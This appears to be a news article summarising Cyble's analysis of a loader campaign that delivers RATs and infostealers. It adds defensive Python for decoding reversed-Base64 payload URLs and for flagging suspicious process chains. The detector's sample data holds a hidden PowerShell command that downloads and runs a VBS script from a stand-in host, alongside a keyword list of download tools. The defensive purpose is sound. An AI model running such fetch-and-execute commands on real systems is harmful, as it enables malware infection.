Cyble researchers have identified a sophisticated attack campaign that uses obfuscation, a unique User Account Control (UAC) bypass and other stealthy techniques to deliver a unified commodity loader and infect systems with Remote Access Trojans (RATs) and infostealers.
The malware campaign targets the Manufacturing and Government sectors in Europe and the Middle East, with a specific focus on Italy, Finland, and Saudi Arabia, but shares common features with other attack campaigns, suggesting a shared malware delivery framework used by multiple “high-capability” threat actors.
“The primary objective is the exfiltration of sensitive industrial data and the compromise of high-value administrative credentials,” Cyble Research and Intelligence Labs (CRIL) said in a blog post published today.
Sophisticated Attack Campaign Uses Loader Shared by ‘High-capability’ Threat Actors
The sophisticated commodity loader at the heart of the campaign is “utilized by multiple high-capability threat actors,” Cyble said.
“Our research confirms that identical loader artifacts and execution patterns link this campaign to a broader infrastructure shared across multiple threat actors,” the researchers said.
The CRIL researchers describe “a striking uniformity of tradecraft, uncovering a persistent architectural blueprint that serves as a common thread. Despite the deployment of diverse malware payloads, the delivery mechanism remains constant.”


The standardized methodology includes the use of steganography to conceal payloads within image files, the use of string reversal and Base64 encoding for obfuscation, and the delivery of encoded payload URLs directly to the loader. The threat actors also “consistently abuse legitimate .NET framework executables to facilitate advanced process hollowing techniques.”
Cyble said researchers from Seqrite, Nextron Systems, and Zscaler have documented similar findings in other campaigns, including “identical class naming conventions and execution patterns across a variety of malware families and operations.”
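As an added illustration of the obfuscation the report describes (string reversal layered with Base64 encoding around a payload URL), the following Python is an analyst-side decoder written for this article; it is not code from Cyble's report or from the loader. The URL, the layering order (Base64 then reverse) and the helper names are assumptions made so the example runs on a constructed sample. The decoder peels layers until nothing decodes cleanly and then pulls any URL out of the recovered text.

```python
import base64
import binascii
import re
from typing import List, Optional, Tuple

# Constructed stand-in for a stage-two download location. It is a placeholder
# written for this example, not an indicator of compromise from the report.
PLACEHOLDER_URL = "https://stage2.example.invalid/update.png"

# Strict Base64 shape: alphabet only, with at most two trailing pad characters.
B64_SHAPE = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")
URL_RE = re.compile(r"https?://[^\s\"'<>]+")


def obfuscate(plain: str) -> str:
    """Apply one Base64-then-reverse layer (assumed order, used only to build the sample)."""
    return base64.b64encode(plain.encode("utf-8")).decode("ascii")[::-1]


def _decode_b64_text(candidate: str) -> Optional[str]:
    """Strict Base64 decode that only accepts printable ASCII output, else None."""
    compact = "".join(candidate.split())
    if not compact or len(compact) % 4 or not B64_SHAPE.match(compact):
        return None
    try:
        raw = base64.b64decode(compact, validate=True)
    except (binascii.Error, ValueError):
        return None
    if not raw.isascii():
        return None
    text = raw.decode("ascii")
    return text if text.isprintable() else None


def peel_layers(value: str, max_depth: int = 8) -> List[Tuple[str, str]]:
    """Strip reverse/Base64 layers until nothing decodes cleanly.
    Returns the sequence of (operation, intermediate_result) pairs."""
    steps: List[Tuple[str, str]] = []
    current = value
    for _ in range(max_depth):
        # Reversal is tried first because it is the outermost layer in the
        # constructed sample; a plain Base64 layer is accepted as the fallback.
        for label, candidate in (("reverse+base64", current[::-1]), ("base64", current)):
            decoded = _decode_b64_text(candidate)
            if decoded is not None:
                steps.append((label, decoded))
                current = decoded
                break
        else:
            break  # neither form decoded: the innermost text has been reached
    return steps


def extract_urls(text: str) -> List[str]:
    """Return every http(s) URL found in recovered text."""
    return URL_RE.findall(text)


def recover_payload_url(obfuscated: str) -> Optional[str]:
    """Peel all layers and return the first URL in the innermost text, if any."""
    steps = peel_layers(obfuscated)
    if not steps:
        return None
    urls = extract_urls(steps[-1][1])
    return urls[0] if urls else None


if __name__ == "__main__":
    sample = obfuscate(obfuscate(PLACEHOLDER_URL))  # two nested layers, constructed here
    for op, result in peel_layers(sample):
        print(f"{op:16s} -> {result[:60]}")
    print("payload URL:", recover_payload_url(sample))
```

Because the decoder stops as soon as a layer fails to produce printable ASCII, it will not misread a real URL (which contains characters outside the Base64 alphabet) as one more layer; the same loop also copes with samples that nest the two operations more than twice.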
The researchers shared code samples of the shared loader architecture and noted, “This consistency suggests that the loader might be part of a shared delivery framework used by multiple threat actors.”
The loaders have been observed delivering a variety of RATs and infostealers, such as PureLog Stealer, Katz Stealer, DC Rat, Async Rat, and Remcos. “This indicates the loader is likely shared or sold across different threat actor groups,” Cyble said.
“The fact that multiple malware families leverage these class naming conventions as well as execution patterns … is further testament to how potent this threat is to the target nations and sectors,” Cyble added.
Campaign Uses Obfuscation, UAC Bypass
The campaign documented by Cyble uses “a diverse array of infection vectors,” such as Office documents that weaponize CVE-2017-11882, malicious SVG files, ZIP archives containing LNK shortcuts, and a unique User Account Control (UAC) bypass.
One sample used an LNK file and PowerShell to download a VBS loader, along with the UAC bypass method.
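To show what the LNK-to-PowerShell-to-VBS chain described above looks like from the detection side, here is an added Python example written for this article rather than taken from Cyble's report. It runs three simple parent/child and command-line checks over constructed process-creation events laid out like Sysmon Event ID 1 fields (ParentImage, Image, CommandLine); the event records, paths and hostnames are all made up for the example.

```python
import re
from typing import Dict, List, Tuple

# Constructed process-creation events. These records were written for this
# example and are not telemetry from the campaign Cyble analysed.
SAMPLE_EVENTS: List[Dict[str, str]] = [
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -w hidden -nop -c \"iwr http://dl.example.invalid/a.vbs "
                    "-OutFile $env:TEMP\\a.vbs; wscript $env:TEMP\\a.vbs\""},
    {"ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "Image": r"C:\Windows\System32\wscript.exe",
     "CommandLine": r"wscript C:\Users\alice\AppData\Local\Temp\a.vbs"},
    {"ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": r"powershell.exe -NoProfile -File C:\Scripts\inventory.ps1"},
    {"ParentImage": r"C:\Windows\System32\services.exe",
     "Image": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "svchost.exe -k netsvcs"},
]

# Command-line fragments that indicate PowerShell is fetching content from the network.
DOWNLOAD_TOKENS = ("downloadstring", "downloadfile", "invoke-webrequest",
                   "iwr ", "curl ", "wget ", "net.webclient", "bitstransfer")
POWERSHELL = ("powershell.exe", "pwsh.exe")
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe")
# A .vbs launched from a user-writable location (Temp, AppData, Downloads).
USER_WRITABLE_VBS = re.compile(r"\\(temp|appdata|downloads)\\[^\s\"']*\.vbs")


def _basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def classify(event: Dict[str, str]) -> List[str]:
    """Return the names of every detection rule the event matches (empty if none)."""
    parent = _basename(event["ParentImage"])
    image = _basename(event["Image"])
    cmd = event["CommandLine"].lower()
    findings: List[str] = []
    if image in POWERSHELL:
        # Explorer launching PowerShell that downloads something is the shape of
        # a double-clicked shortcut fetching a second stage.
        if parent == "explorer.exe" and any(tok in cmd for tok in DOWNLOAD_TOKENS):
            findings.append("powershell-download-from-explorer")
        if ".vbs" in cmd:
            findings.append("powershell-references-vbs")
    if image in SCRIPT_HOSTS:
        if parent in POWERSHELL:
            findings.append("script-host-spawned-by-powershell")
        if USER_WRITABLE_VBS.search(cmd):
            findings.append("vbs-from-user-writable-path")
    return findings


def scan(events: List[Dict[str, str]]) -> List[Tuple[int, List[str]]]:
    """Index and findings for every event that matched at least one rule."""
    hits = []
    for idx, event in enumerate(events):
        findings = classify(event)
        if findings:
            hits.append((idx, findings))
    return hits


if __name__ == "__main__":
    for idx, findings in scan(SAMPLE_EVENTS):
        print(idx, _basename(SAMPLE_EVENTS[idx]["Image"]), findings)
```

The third event, an administrator's scheduled inventory script, is deliberately included as a benign PowerShell launch from Explorer: it matches none of the rules because it neither downloads anything nor references a script host or a `.vbs` file, which is the kind of negative case worth keeping in a rule's test set.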
The UAC bypass technique appears in later stages of the attack, where the malware monitors process creation events and triggers a UAC prompt when a new process is launched, “tricking the system or user into granting elevated privileges under the guise of a routine operation” and “enabling the execution of a PowerShell process with elevated privileges after user approval.”
“The discovery of a novel UAC bypass confirms that this is not a static threat, but an evolving operation with a dedicated development cycle,” the researchers added. “Organizations, especially in the targeted regions, should treat ‘benign’ image files and email attachments with heightened scrutiny.”
The campaign begins with phishing emails masquerading as standard Purchase Order communications.
Image files are hosted on legitimate delivery platforms and contain steganographically embedded payloads, “allowing the malicious code to slip past file-based detection systems by masquerading as benign traffic.”
The threat actors use a sophisticated “hybrid assembly” technique to “trojanize” open-source libraries. “By appending malicious functions to trusted open-source libraries and recompiling them, the resulting files retain their authentic appearance and functionality, making signature-based detection extremely difficult,” the researchers said.
The infection chain is also engineered “to minimize forensic footprint,” including script obfuscation, steganographic extraction, reflective loading to run code directly in memory, and process injection to hide malicious activity within legitimate system processes.
The full Cyble blog takes an in-depth technical look at one sample and also includes recommendations, MITRE tactics, techniques and procedures (TTPs), and Indicators of Compromise (IoCs).
